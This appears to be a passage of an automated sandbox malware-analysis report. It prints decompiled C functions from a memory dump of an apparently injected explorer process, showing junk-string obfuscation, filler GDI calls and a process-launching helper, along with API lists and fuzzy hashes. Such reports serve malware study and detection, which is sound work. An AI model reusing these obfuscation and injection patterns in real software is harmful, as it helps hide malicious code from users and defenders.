				_t45 = E00F5ACD6(" 22XNrPYyPMKEP6HSb0.FS61  liA eu5X w9.wLnrPzBujnVu5.U70Tc6LGpu5E9S,2ymm2,qBKU Lt9wdaw o7guJE302HG46BxGX0ZAdBrUdvDTdXlK,kxf9hZ,v3toXqkfB4f2huuK crlO7YB6INB6wk qK6sC9PmtslNgeQGYIKMVt QNwxB2IzGag0CCh1ZeUzOVNQh8FpK0m5Sf1wDFQuOX416 OUaPv CnowZp6ULn17MCA0ilTFJ Yuka7kdsFc2ekU5G VEK,JDPe4n9 xrJqDOae1gRVg0HwmKo6..QkXL8UonYecK3IzUO9 vd ciN7CQbhBnH.dnE28USGPf6oxJl2,nrOFmNCIpKW9Mw qcpUgFkGFrrsDUYPWS1D2T  AkmowtZ5kNR5suZLK6Jbkpa30A7qB4W69clRdXvd6q6eCou58AJi IgZWO8e1EMLy6CUUcorql2  ElOq pAwU34tqbvixh6oqSGjP4cx.5cev5a2DwZdbkGRUYYNCIGPL0c1MOe8,uqOQP1G9fp,CQcjruVwIR0WhYDH2A2i2hfJfqptjB6ZZCZMlVVjksc6fVB4baqE5Efv0ipYv0yhKxoA9Q.e0e Q quEGQQi I0XniQKgsBbMKgEgieG0FxW0Q5iKWlj gbXrPNl48g3mDgStMajbNwpepCBFyEw7ga  Rk3020 b jLFmfU uXPkKdJSJmP0GnIhwh 64YZzM62vaBly7dl8EdSL63uRI4q.e.vHFaxZNsiuZ95efWNS8cKY tT VW5G8nrz8yY8q9HJjJUJE3sxah lWUNnn3e1je0xWVU8mWassysHX1urRGhrriSU.wiYlZFvgCDgx7LAnSck.vY7xoAVAE7PwEgOblzOfITfSHm1YgnN3ri0Tb.oumxUUf1S3y3IkTwqsY5PWYuP6AO6b,jCo T9gphQ FVnEtmT.573rGOL Df0,6x44utlM02 TOLItyW,M1vtUXc1 axKGoEc2a2w5mVHugDL8xM2B4EAreRrV,wZIRr6lyqSX62mlXT,MIi1M81Wsef zq Ma3,x6pjKBzjQd ucymLu4KbueF azzx8,FRfAscH .O5kM.vsn8BFfCDhritluuHQaL,Ut9UYd RAMhvj08L0YDp. QwT,kDlImfJkdNOIH a4F8uqEdxgIoxx, y0bvqGc.thRGSo28 R 3n5HyVaC57Tk VC2IxFa6X0cRlKg9ECBSzhX 6Wgck8ZmUWFqRG.YS3R BGAz.HMQ1NputzAay0j8qVKs5qOzxN6sWTXRt0 Bv");
				_t90 = 0xf;
				_v8 = _t90;
				if(_t45 <= _t90) {
					_v8 = _t45;
				}
				_t82 = 0;
				_v9 = 0;
				if(_v8 > 0) {
					do {
						_t8 = _t82 + 0x42; // 0x42
						 *((char*)(_t102 + _t82 - 0x14)) = _t8;
						MultiByteToWideChar(0, 0,  &_v24, 0xffffffff,  &_v88, 0x20);
						_t82 = _t82 + 1;
					} while (_t82 < _v8);
				}
				_t14 = _t101 + 0x4c; // 0x4c
				E00F5AB81(_t14, _t98);
				_t15 = _t101 + 0x54; // 0x54
				E00F5AB81(_t15, _t98);
				_t16 = _t101 + 0x58; // 0x58
				E00F5AB81(_t16, _t98);
				_t17 = _t101 + 0x6c; // 0x6c
				E00F5AB81(_t17, _t98);
				_t18 = _t101 + 0x70; // 0x70
				E00F5AB81(_t18, _t98);
				_t19 = _t101 + 0x7c; // 0x7c
				_t99 = _t19;
				_t56 =  *_t99;
				_t83 = 0;
				_t104 = _t103 + 0x28;
				if(_t56 != 0) {
					_v8 = 0;
					if( *_t56 > 0) {
						do {
							E00F5AB81( *((intOrPtr*)(_t56 + 4)) + _t83, 0xfffffffe);
							E00F5AB81( *((intOrPtr*)( *_t99 + 4)) + _t83 + 4, 0xfffffffe);
							E00F5AB81( *((intOrPtr*)( *_t99 + 4)) + _t83 + 8, 0xfffffffe);
							_t56 =  *_t99;
							_t104 = _t104 + 0x18;
							_v8 = _v8 + 1;
							_t83 = _t83 + 0xc;
						} while (_v8 <  *((intOrPtr*)( *_t99)));
					}
					E00F5AB81( *_t99 + 4, 0);
					E00F5AB81(_t99, 0);
				}
				_t31 = _t101 + 0x98; // 0x98
				_t84 = _t31;
				_t100 = 0;
				if( *_t31 != 0) {
					__imp__GetCPInfoExA(0x15, 0x59,  &_v372);
					if( *((intOrPtr*)(_t101 + 0x94)) > 0) {
						do {
							E00F5AB81( *_t84 + _t100 * 4, 0xfffffffe);
							_t100 = _t100 + 1;
						} while (_t100 <  *((intOrPtr*)(_t101 + 0x94)));
					}
					E00F5AB81(_t84, 0);
				}
				return E00F5AB81(_a4, 0xcc);
			}

0x00f5a358
0x00f5a35d
0x00f5a35e
0x00f5a363
0x00f5a36c
0x00f5a372
0x00f5a377
0x00f5a37e
0x00f5a389
0x00f5a391
0x00f5a392
0x00f5a397
0x00f5a399
0x00f5a399
0x00f5a39c
0x00f5a39e
0x00f5a3a5
0x00f5a3a7
0x00f5a3a9
0x00f5a3ac
0x00f5a3be
0x00f5a3c4
0x00f5a3c5
0x00f5a3a7
0x00f5a3ca
0x00f5a3cf
0x00f5a3d4
0x00f5a3d9
0x00f5a3de
0x00f5a3e3
0x00f5a3e8
0x00f5a3ed
0x00f5a3f2
0x00f5a3f7
0x00f5a3fc
0x00f5a3fc
0x00f5a3ff
0x00f5a401
0x00f5a403
0x00f5a408
0x00f5a40a
0x00f5a40f
0x00f5a411
0x00f5a419
0x00f5a42a
0x00f5a43b
0x00f5a440
0x00f5a442
0x00f5a445
0x00f5a44b
0x00f5a44e
0x00f5a411
0x00f5a45a
0x00f5a462
0x00f5a467
0x00f5a46a
0x00f5a46a
0x00f5a470
0x00f5a474
0x00f5a481
0x00f5a48d
0x00f5a48f
0x00f5a497
0x00f5a49c
0x00f5a49f
0x00f5a48f
0x00f5a4aa
0x00f5a4b0
0x00f5a4c4

APIs

Part of subcall function 00F5AB81: RtlFreeHeap.NTDLL(00000000,00000000,00F7B218,0000011C), ref: 00F5ABC7

IsValidCodePage.KERNEL32(00000009,?,00000000,00000000), ref: 00F5A36C
GetLastError.KERNEL32 ref: 00F5A37E
MultiByteToWideChar.KERNEL32(00000000,00000000,00F598B3,000000FF,?,00000020), ref: 00F5A3BE
GetCPInfoExA.KERNEL32(00000015,00000059,?), ref: 00F5A481

Strings

22XNrPYyPMKEP6HSb0.FS61 liA eu5X w9.wLnrPzBujnVu5.U70Tc6LGpu5E9S,2ymm2,qBKU Lt9wdaw o7guJE302HG46BxGX0ZAdBrUdvDTdXlK,kxf9hZ,v3toXqkfB4f2huuK crlO7YB6INB6wk qK6sC9PmtslNgeQGYIKMVt QNwxB2IzGag0CCh1ZeUzOVNQh8FpK0m5Sf1wDFQuOX416 OUaPv CnowZp6ULn17MCA0ilTFJ Yuka7, xrefs: 00F5A384

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: ByteCharCodeErrorFreeHeapInfoLastMultiPageValidWide
String ID: 22XNrPYyPMKEP6HSb0.FS61 liA eu5X w9.wLnrPzBujnVu5.U70Tc6LGpu5E9S,2ymm2,qBKU Lt9wdaw o7guJE302HG46BxGX0ZAdBrUdvDTdXlK,kxf9hZ,v3toXqkfB4f2huuK crlO7YB6INB6wk qK6sC9PmtslNgeQGYIKMVt QNwxB2IzGag0CCh1ZeUzOVNQh8FpK0m5Sf1wDFQuOX416 OUaPv CnowZp6ULn17MCA0ilTFJ Yuka7
API String ID: 3965322737-859159525
Opcode ID: 6894741fcd428b71a5fdd21d3b88c879ec7e385f064d5928150b59b3507fe409
Instruction ID: 9d6e5f9aaa0728113c31e5d8969cc9a4a0e333e67b1d5e68369a4cb0e149ccd8
Opcode Fuzzy Hash: 6894741fcd428b71a5fdd21d3b88c879ec7e385f064d5928150b59b3507fe409
Instruction Fuzzy Hash: D7410831904205BFDB10EBA8DC86E9A73FDEF84321F2102A9FB1587191E674E519D762

Uniqueness

Uniqueness Score: -1.00%

Function 00F514A3, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128
windowCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E00F514A3(void* __ecx, void* __edi, intOrPtr* _a4) {
				char _v8;
				char _v12;
				char _v16;
				char _v17;
				char _v32;
				short _v96;
				void* __esi;
				char _t31;
				char _t32;
				void* _t44;
				signed int _t50;
				signed int _t51;
				void* _t53;
				void* _t58;
				void* _t69;
				void* _t74;

				_t58 = __ecx;
				_t24 = _a4;
				_push(_t50);
				_t51 = _t50 | 0xffffffff;
				if( *_a4 == 1) {
					_push(__edi);
					_t31 = E00F5B550(E00F5B6F0(E00F5D2EE( *((intOrPtr*)( *((intOrPtr*)(_t24 + 4)))), 0)));
					_v16 = _t31;
					if(_t31 != 0) {
						_t32 = E00F58AF1(_t58, 0x496);
						_push(0);
						_v12 = _t32;
						_push(0xf722a8);
						_push(_v16);
						_push(0xf722a8);
						_push(0xf722ac);
						_v8 = E00F5B60A(_v12);
						E00F5BA86( &_v12);
						if(_v8 != 0) {
							_v12 = 0;
							if(E00F5BAA0(_v8,  &_v12, 0x7530, 1) != 0) {
								GetLastError();
								_t44 = E00F5ACD6(" yWejZljp,xJiZuNRPD.BOj9Idaiwm sSX4F33KwpsA V5BEVvr5z7xL03 x hxiJ78 ,PQ nOw29IrGVl6dbf,D,q0jC4njnQR,,ANKbYlREw0TJ.PJLJw,DvmnDI8DlMn7Bv37DWdJprY29wk5rHfBAKde 7XpKTytDm0 KWa4dnATjRYXLMn5bb4 UcBtHS0QvOapcWi  T,sl0 2w,zOO.G Sn i,Rsc,Lue42G66 xOKCbdGTaxOJF1cYIuY H eC6Ti");
								_t69 = 0xf;
								if(_t44 <= _t69) {
									_t69 = _t44;
								}
								_t53 = 0;
								_v17 = 0;
								if(_t69 > 0) {
									do {
										_t14 = _t53 + 0x42; // 0x42
										 *((char*)(_t74 + _t53 - 0x1c)) = _t14;
										MultiByteToWideChar(0, 0,  &_v32, 0xffffffff,  &_v96, 0x20);
										_t53 = _t53 + 1;
									} while (_t53 < _t69);
								}
								BitBlt(0, 0x2f, 0x42, 0x14, 0x13, 0, 0x20, 0x3c, 2);
								asm("sbb ebx, ebx");
								_t51 = ( ~(_v12 - 1) & 0x00000002) - 2;
							}
							E00F5AB81( &_v8, 0xfffffffe);
						}
						E00F5AB81( &_v16, 0xfffffffe);
					}
					_t24 = _a4;
				}
				E00F5B78C(_t24, _t24 + 4);
				Arc(0, 0x62, 0x4d, 0xf, 0xf, 0xb, 0x46, 0x63, 0x5e);
				return _t51;
			}

0x00f514a3
0x00f514a6
0x00f514ac
0x00f514ad
0x00f514b4
0x00f514bd
0x00f514d0
0x00f514d8
0x00f514dd
0x00f514e8
0x00f514ed
0x00f514ee
0x00f514f6
0x00f514f7
0x00f514fa
0x00f514fb
0x00f51508
0x00f5150f
0x00f5151a
0x00f5152e
0x00f5153b
0x00f5153d
0x00f51548
0x00f51550
0x00f51553
0x00f51555
0x00f51555
0x00f51557
0x00f51559
0x00f5155f
0x00f51561
0x00f51563
0x00f51566
0x00f51576
0x00f5157c
0x00f5157d
0x00f51561
0x00f51591
0x00f5159d
0x00f515a2
0x00f515a2
0x00f515ab
0x00f515b1
0x00f515b8
0x00f515be
0x00f515bf
0x00f515c2
0x00f515c9
0x00f515e1
0x00f515ec

APIs

Arc.GDI32(00000000,00000062,0000004D,0000000F,0000000F,0000000B,00000046,00000063,0000005E), ref: 00F515E1

Part of subcall function 00F5B60A: lstrcatW.KERNEL32(00000000,00000000), ref: 00F5B64A

Part of subcall function 00F5BAA0: memset.MSVCRT ref: 00F5BAB4
Part of subcall function 00F5BAA0: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,00000000,00000044,?,?,00000000,00000001), ref: 00F5BAFD
Part of subcall function 00F5BAA0: GetExitCodeProcess.KERNEL32 ref: 00F5BB21

GetLastError.KERNEL32 ref: 00F5153D
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 00F51576
BitBlt.GDI32(00000000,0000002F,00000042,00000014,00000013,00000000,00000020,0000003C,00000002), ref: 00F51591

Strings

yWejZljp,xJiZuNRPD.BOj9Idaiwm sSX4F33KwpsA V5BEVvr5z7xL03 x hxiJ78 ,PQ nOw29IrGVl6dbf,D,q0jC4njnQR,,ANKbYlREw0TJ.PJLJw,DvmnDI8DlMn7Bv37DWdJprY29wk5rHfBAKde 7XpKTytDm0 KWa4dnATjRYXLMn5bb4 UcBtHS0QvOapcWi T,sl0 2w,zOO.G Sn i,Rsc,Lue42G66 xOKCbdGTaxOJF1cYIuY H , xrefs: 00F51543

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: Process$ByteCharCodeCreateErrorExitLastMultiWidelstrcatmemset
String ID: yWejZljp,xJiZuNRPD.BOj9Idaiwm sSX4F33KwpsA V5BEVvr5z7xL03 x hxiJ78 ,PQ nOw29IrGVl6dbf,D,q0jC4njnQR,,ANKbYlREw0TJ.PJLJw,DvmnDI8DlMn7Bv37DWdJprY29wk5rHfBAKde 7XpKTytDm0 KWa4dnATjRYXLMn5bb4 UcBtHS0QvOapcWi T,sl0 2w,zOO.G Sn i,Rsc,Lue42G66 xOKCbdGTaxOJF1cYIuY H
API String ID: 1463280111-4026835976
Opcode ID: 397d1ea617fb85d06ced51352ab32f41121a8ac81722ef3c22dbc5d406dca3bc
Instruction ID: 19f0b70ddd46a6c138b21af173b27804f497ad19e71463d57b2dfdc1c9e9333e
Opcode Fuzzy Hash: 397d1ea617fb85d06ced51352ab32f41121a8ac81722ef3c22dbc5d406dca3bc
Instruction Fuzzy Hash: 66412D31E403087BEB30ABA4DC87F9E7BA9EB04761F144251FB15AA0C2E7749644A751

Uniqueness

Uniqueness Score: -1.00%

Function 00F55945, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82
windowCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00F55945(void* __ebx, void* __eflags) {
				char _v5;
				char _v20;
				char _v60;
				short _v124;
				void* __esi;
				intOrPtr _t11;
				intOrPtr _t16;
				intOrPtr _t20;
				void* _t22;
				void* _t24;
				void* _t29;
				void* _t30;
				void* _t34;
				void* _t37;
				char* _t38;
				void* _t39;
				void* _t41;
				void* _t42;

				_t29 = __ebx;
				_t11 =  *0xf89720; // 0xf90000
				_t38 =  &_v60;
				E00F5CDBD(_t38, __eflags,  *((intOrPtr*)(_t11 + 0xac)) + 4);
				_t16 =  *0xf89740; // 0x547f6c8
				_t39 =  *((intOrPtr*)(_t16 + 0xbc))(2, 0, _t38, _t34, _t37);
				Arc(0, 0x54, 0xf, 0x4d, 0x49, 0xe, 0x1f, 0x3d, 0x15);
				if(_t39 != 0) {
					BitBlt(0, 0x19, 0x53, 0x26, 0x37, 0, 0x5f, 0x57, 0x4d);
					_t20 =  *0xf89740; // 0x547f6c8
					 *((intOrPtr*)(_t20 + 0x30))(_t39);
					_t22 = _t39;
				} else {
					GetLastError();
					_t24 = E00F5ACD6("6p Kk Vvvme8FsIAM1wS5 oAOyq7OOs56.qVfZ7IplUnT1df3q,0qROuGXf7H8gekmGUxCDTDtHqdGChjJBjZcMjZ2U0U, z44aKG4qKc.AbVZi0ABU j6Yn99We,OT1VtRPHXpvKTDEosbvrBHV85VofebWARL k26,8zho.j8dlE.Uc44rtn9QqUEjGF29GCy4qzboT4pOi7ZneozJrM45lrMFgrHgSw fVE1Zcd1 MhA oTo3d zZQM mPLi8t2 aQTi1.QJ qR 2Dn,Tc dVDa6XqiWbxOHZ,W1HGo 9TKu 4,tYKGok4kBBVwC6GNd fLJHOy,Z4lK.W9vm.hJ0R9wR47SkpCH9.pizhuqRLFzhSVu3 zIPtCvNbjq7WDm ldpvp.AHsJQm3ZNB7WvDB sE5 C2vB0 ue,BCqrg1IH.Sb O8u.xbAbfBX7XCjU 3,LWl6dQn Bk N73ufBsK wGC3qvIGY lNKlbcV7TR.8z,xkSL8v,G. SQ6XWgK RxLYQ0UwQPOZRerNBgv8E7DDjKFXR P0tK3OrZ6GOAVxRiBSxcn3  L.ayVfmZyU,c42k0TlCuJklWpJm,XjTYY1TQmZdeKMci2. vxWXCAZZZ0ykoQDiBFrt m3GaTrvF57yrEBR4lRTt,4vPBKYXmMfWi6I5cpcO DFp5Xgx qK.Ta22Z691cG4MiA.afsmb7Kipani,2u6Lcp2SSG z vrPQjD3uEG5Wu tlT D1aIqttI4259FbouzmRGZaukkHycsW tV HRHy8hWo.PyLjQyizVXHenVCGqp V");
					if(_t24 <= 0xf) {
						_t41 = _t24;
					} else {
						_t41 = 0xf;
					}
					_push(_t29);
					_t30 = 0;
					_v5 = 0;
					if(_t41 > 0) {
						do {
							_t5 = _t30 + 0x42; // 0x42
							 *((char*)(_t42 + _t30 - 0x10)) = _t5;
							MultiByteToWideChar(0, 0,  &_v20, 0xffffffff,  &_v124, 0x20);
							_t30 = _t30 + 1;
						} while (_t30 < _t41);
					}
					_t22 = 0;
				}
				return _t22;
			}

0x00f55945
0x00f55948
0x00f5595c
0x00f5595f
0x00f55968
0x00f55989
0x00f5598b
0x00f55993
0x00f559f2
0x00f559f8
0x00f559fe
0x00f55a01
0x00f55995
0x00f55995
0x00f559a0
0x00f559a9
0x00f559b0
0x00f559ab
0x00f559ad
0x00f559ad
0x00f559b2
0x00f559b3
0x00f559b5
0x00f559bb
0x00f559bd
0x00f559bf
0x00f559c2
0x00f559d2
0x00f559d8
0x00f559d9
0x00f559bd
0x00f559dd
0x00f559df
0x00f55a06

APIs

Arc.GDI32(00000000,00000054,0000000F,0000004D,00000049,0000000E,0000001F,0000003D,00000015), ref: 00F5598B
GetLastError.KERNEL32 ref: 00F55995
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 00F559D2
BitBlt.GDI32(00000000,00000019,00000053,00000026,00000037,00000000,0000005F,00000057,0000004D), ref: 00F559F2

Strings

6p Kk Vvvme8FsIAM1wS5 oAOyq7OOs56.qVfZ7IplUnT1df3q,0qROuGXf7H8gekmGUxCDTDtHqdGChjJBjZcMjZ2U0U, z44aKG4qKc.AbVZi0ABU j6Yn99We,OT1VtRPHXpvKTDEosbvrBHV85VofebWARL k26,8zho.j8dlE.Uc44rtn9QqUEjGF29GCy4qzboT4pOi7ZneozJrM45lrMFgrHgSw fVE1Zcd1 MhA oTo3d zZQM mPLi8t2 a, xrefs: 00F5599B

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: ByteCharErrorLastMultiWide
String ID: 6p Kk Vvvme8FsIAM1wS5 oAOyq7OOs56.qVfZ7IplUnT1df3q,0qROuGXf7H8gekmGUxCDTDtHqdGChjJBjZcMjZ2U0U, z44aKG4qKc.AbVZi0ABU j6Yn99We,OT1VtRPHXpvKTDEosbvrBHV85VofebWARL k26,8zho.j8dlE.Uc44rtn9QqUEjGF29GCy4qzboT4pOi7ZneozJrM45lrMFgrHgSw fVE1Zcd1 MhA oTo3d zZQM mPLi8t2 a
API String ID: 203985260-138537390
Opcode ID: 9efc4ab68f215c86915ba6a1743c98119251a409128239ec8421334107591f32
Instruction ID: 8caf76b2017a8aa47d92085481f15b29f70101b28531925fb65de687d7b63376
Opcode Fuzzy Hash: 9efc4ab68f215c86915ba6a1743c98119251a409128239ec8421334107591f32
Instruction Fuzzy Hash: D821D832784358BBF73097A89C8AFBF77ACE744F61F100125FB15EA1D2D2949448E6A1

Uniqueness

Uniqueness Score: -1.00%

Function 00F6E97F, Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 159
COMMON

Download Yara Rule

C-Code - Quality: 18%

			E00F6E97F(signed int __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				signed int _v8;
				signed int _v12;
				char _v28;
				signed int _t29;
				signed int _t31;
				signed int _t32;
				signed int _t33;
				char* _t34;
				signed int _t35;
				signed int _t41;
				signed int _t49;
				signed int _t52;
				signed int _t56;
				signed int _t57;
				signed int _t58;
				void* _t60;
				signed int _t62;
				signed int _t64;
				void* _t65;
				void* _t66;
				void* _t67;

				_t64 = __eax;
				_t29 = _a8("\"", 1, _a12);
				_t67 = _t66 + 0xc;
				if(_t29 == 0) {
					_t31 = _a4 + __eax;
					__eflags = _t31;
					_t62 = __eax;
					_t49 = __eax;
					_v12 = _t31;
					while(1) {
						L3:
						__eflags = _t49 - _v12;
						if(_t49 >= _v12) {
							goto L14;
						} else {
							goto L4;
						}
						while(1) {
							L4:
							_t35 = E00F6F4A7(_t62, _v12 - _t62,  &_v8);
							_t49 = _t35;
							_t67 = _t67 + 0xc;
							__eflags = _t49;
							if(_t49 == 0) {
								break;
							}
							_t32 = _v8;
							__eflags = _t32 - 0x5c;
							if(_t32 == 0x5c) {
								L15:
								__eflags = _t62 - _t64;
								if(_t62 == _t64) {
									L18:
									__eflags = _t49 - _t62;
									if(_t49 == _t62) {
										_t33 = _a8("\"", 1, _a12);
										L44:
										return _t33;
									}
									_t60 = 2;
									_t65 = 0xd;
									__eflags = _t32 - _t65;
									if(__eflags > 0) {
										__eflags = _t32 - 0x22;
										if(_t32 == 0x22) {
											_t34 = "\\\"";
											L40:
											_t35 = _a8(_t34, _t60, _a12);
											_t67 = _t67 + 0xc;
											__eflags = _t35;
											if(_t35 != 0) {
												break;
											}
											_t62 = _t49;
											_t64 = _t49;
											goto L3;
										}
										__eflags = _t32 - 0x2f;
										if(_t32 == 0x2f) {
											_t34 = "\\/";
											goto L40;
										}
										__eflags = _t32 - 0x5c;
										if(_t32 == 0x5c) {
											_t34 = "\\\\";
											goto L40;
										}
										L33:
										__eflags = _t32 - 0x10000;
										if(_t32 >= 0x10000) {
											_t41 = _t32 - 0x10000;
											_v8 = _t41;
											_t56 = _t41 & 0x000003ff | 0x0000dc00;
											__eflags = _t56;
											_push(_t56);
											_push((_t41 & 0x000ffc00 | 0x03600000) >> 0xa);
											_push("\\u%04X\\u%04X");
											_push(_t65);
											_push( &_v28);
											L00F70750();
											_t67 = _t67 + 0x14;
											_push(0xc);
										} else {
											_push(_t32);
											_push("\\u%04X");
											_push(_t65);
											_push( &_v28);
											L00F70750();
											_t67 = _t67 + 0x10;
											_push(6);
										}
										_pop(_t60);
										_t34 =  &_v28;
										goto L40;
									}
									if(__eflags == 0) {
										_t34 = "\\r";
										goto L40;
									}
									_t52 = _t32 - 8;
									__eflags = _t52;
									if(_t52 == 0) {
										_t34 = "\\b";
										goto L40;
									}
									_t57 = _t52 - 1;
									__eflags = _t57;
									if(_t57 == 0) {
										_t34 = "\\t";
										goto L40;
									}
									_t58 = _t57 - 1;
									__eflags = _t58;
									if(_t58 == 0) {
										_t34 = "\\n";
										goto L40;
									}
									__eflags = _t58 != _t60;
									if(_t58 != _t60) {
										goto L33;
									}
									_t34 = "\\f";
									goto L40;
								}
								_t35 = _a8(_t64, _t62 - _t64, _a12);
								_t67 = _t67 + 0xc;
								__eflags = _t35;
								if(_t35 != 0) {
									break;
								}
								_t32 = _v8;
								goto L18;
							}
							__eflags = _t32 - 0x22;
							if(_t32 == 0x22) {
								goto L15;
							}
							__eflags = _t32 - 0x20;
							if(_t32 < 0x20) {
								goto L15;
							}
							__eflags = _a16 & 0x00000400;
							if((_a16 & 0x00000400) == 0) {
								L10:
								__eflags = _a16 & 0x00000040;
								if((_a16 & 0x00000040) == 0) {
									L12:
									_t62 = _t49;
									__eflags = _t49 - _v12;
									if(_t49 < _v12) {
										continue;
									}
									goto L15;
								}
								__eflags = _t32 - 0x7f;
								if(_t32 > 0x7f) {
									goto L15;
								}
								goto L12;
							}
							__eflags = _t32 - 0x2f;
							if(_t32 == 0x2f) {
								goto L15;
							}
							goto L10;
						}
						_t33 = _t35 | 0xffffffff;
						__eflags = _t33;
						goto L44;
						L14:
						_t32 = _v8;
						goto L15;
					}
				}
				return _t29 | 0xffffffff;
			}

0x00f6e989
0x00f6e992
0x00f6e995
0x00f6e99a
0x00f6e9a8
0x00f6e9a8
0x00f6e9ab
0x00f6e9ad
0x00f6e9af
0x00f6e9b2
0x00f6e9b2
0x00f6e9b2
0x00f6e9b5
0x00000000
0x00000000
0x00000000
0x00000000
0x00f6e9b7
0x00f6e9b7
0x00f6e9c2
0x00f6e9c7
0x00f6e9c9
0x00f6e9cc
0x00f6e9ce
0x00000000
0x00000000
0x00f6e9d4
0x00f6e9d7
0x00f6e9da
0x00f6ea0b
0x00f6ea0b
0x00f6ea0d
0x00f6ea29
0x00f6ea29
0x00f6ea2b
0x00f6eb1d
0x00f6eb28
0x00000000
0x00f6eb29
0x00f6ea33
0x00f6ea36
0x00f6ea37
0x00f6ea39
0x00f6ea7d
0x00f6ea80
0x00f6eaf6
0x00f6eafb
0x00f6eb00
0x00f6eb03
0x00f6eb06
0x00f6eb08
0x00000000
0x00000000
0x00f6eb0a
0x00f6eb0c
0x00000000
0x00f6eb0c
0x00f6ea82
0x00f6ea85
0x00f6eaef
0x00000000
0x00f6eaef
0x00f6ea87
0x00f6ea8a
0x00f6eae8
0x00000000
0x00f6eae8
0x00f6ea8c
0x00f6ea91
0x00f6ea93
0x00f6eaac
0x00f6eab0
0x00f6eac3
0x00f6eac3
0x00f6eac9
0x00f6eacd
0x00f6eace
0x00f6ead6
0x00f6ead7
0x00f6ead8
0x00f6eadd
0x00f6eae0
0x00f6ea95
0x00f6ea95
0x00f6ea96
0x00f6ea9e
0x00f6ea9f
0x00f6eaa0
0x00f6eaa5
0x00f6eaa8
0x00f6eaa8
0x00f6eae2
0x00f6eae3
0x00000000
0x00f6eae3
0x00f6ea3b
0x00f6ea76
0x00000000
0x00f6ea76
0x00f6ea3f
0x00f6ea3f
0x00f6ea42
0x00f6ea6c
0x00000000
0x00f6ea6c
0x00f6ea44
0x00f6ea44
0x00f6ea45
0x00f6ea62
0x00000000
0x00f6ea62
0x00f6ea47
0x00f6ea47
0x00f6ea48
0x00f6ea58
0x00000000
0x00f6ea58
0x00f6ea4a
0x00f6ea4c
0x00000000
0x00000000
0x00f6ea4e
0x00000000
0x00f6ea4e
0x00f6ea18
0x00f6ea1b
0x00f6ea1e
0x00f6ea20
0x00000000
0x00000000
0x00f6ea26
0x00000000
0x00f6ea26
0x00f6e9dc
0x00f6e9df
0x00000000
0x00000000
0x00f6e9e1
0x00f6e9e4
0x00000000
0x00000000
0x00f6e9e6
0x00f6e9ed
0x00f6e9f4
0x00f6e9f4
0x00f6e9f8
0x00f6e9ff
0x00f6e9ff
0x00f6ea01
0x00f6ea04
0x00000000
0x00000000
0x00000000
0x00f6ea06
0x00f6e9fa
0x00f6e9fd
0x00000000
0x00000000
0x00000000
0x00f6e9fd
0x00f6e9ef
0x00f6e9f2
0x00000000
0x00000000
0x00000000
0x00f6e9f2
0x00f6eb25
0x00f6eb25
0x00000000
0x00f6ea08
0x00f6ea08
0x00000000
0x00f6ea08
0x00f6e9b2
0x00000000

Strings

\u%04X, xrefs: 00F6EA96
@, xrefs: 00F6E9F4
\u%04X\u%04X, xrefs: 00F6EACE

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID:
String ID: @$\u%04X$\u%04X\u%04X
API String ID: 0-2132903582
Opcode ID: 542486a5133d20500c992b7cf1b755985fda2838d38c48734d8db221a9d63d0c
Instruction ID: 364b719fa340e5bdbf1bf84cd49a969cf9d6ab32d86f204320fe0cd5e769b534
Opcode Fuzzy Hash: 542486a5133d20500c992b7cf1b755985fda2838d38c48734d8db221a9d63d0c
Instruction Fuzzy Hash: 4D41F73BA00145ABDF248EDC8DC9BFE3A64FF44324F248522F906D7185D668CD45F662

Uniqueness

Uniqueness Score: -1.00%

Function 00F597B0, Relevance: 7.6, APIs: 5, Instructions: 105
threadCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E00F597B0(struct HDC__* __edx, void* __fp0) {
				char _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				intOrPtr _t14;
				void* _t15;
				void* _t17;
				void* _t18;
				char _t22;
				intOrPtr _t25;
				intOrPtr _t27;
				intOrPtr _t29;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr _t39;
				void* _t48;
				intOrPtr _t52;
				void* _t53;
				struct HDC__* _t54;
				char _t60;
				void* _t68;
				void* _t71;

				_t71 = __fp0;
				_t54 = __edx;
				while(1) {
					_t14 =  *0xf89740; // 0x547f6c8
					_t15 =  *((intOrPtr*)(_t14 + 0x2c))( *0xf897a0, 0);
					if(_t15 == 0 || _t15 == 0x80) {
						break;
					}
					E00F5CEF9(_t54,  &_v36);
					_t35 =  *0xf897d4; // 0x0
					_t52 =  *0xf897d0; // 0x0
					_t53 = _t52 + 0x3840;
					asm("adc eax, ebx");
					_t68 = _t35 - _v32;
					if(_t68 > 0 || _t68 >= 0 && _t53 >= _v36) {
						IsValidCodePage(0x38);
						_t29 = 0;
					} else {
						_t37 =  *0xf89740; // 0x547f6c8
						_push(0);
						_push( *0xf897c0);
						if( *((intOrPtr*)(_t37 + 0xc8))() == 0) {
							break;
						} else {
							_t39 =  *0xf89740; // 0x547f6c8
							 *((intOrPtr*)(_t39 + 0xb4))(0x1388);
							continue;
						}
					}
					L16:
					return _t29;
				}
				E00F5CEF9(_t54, 0xf897d0);
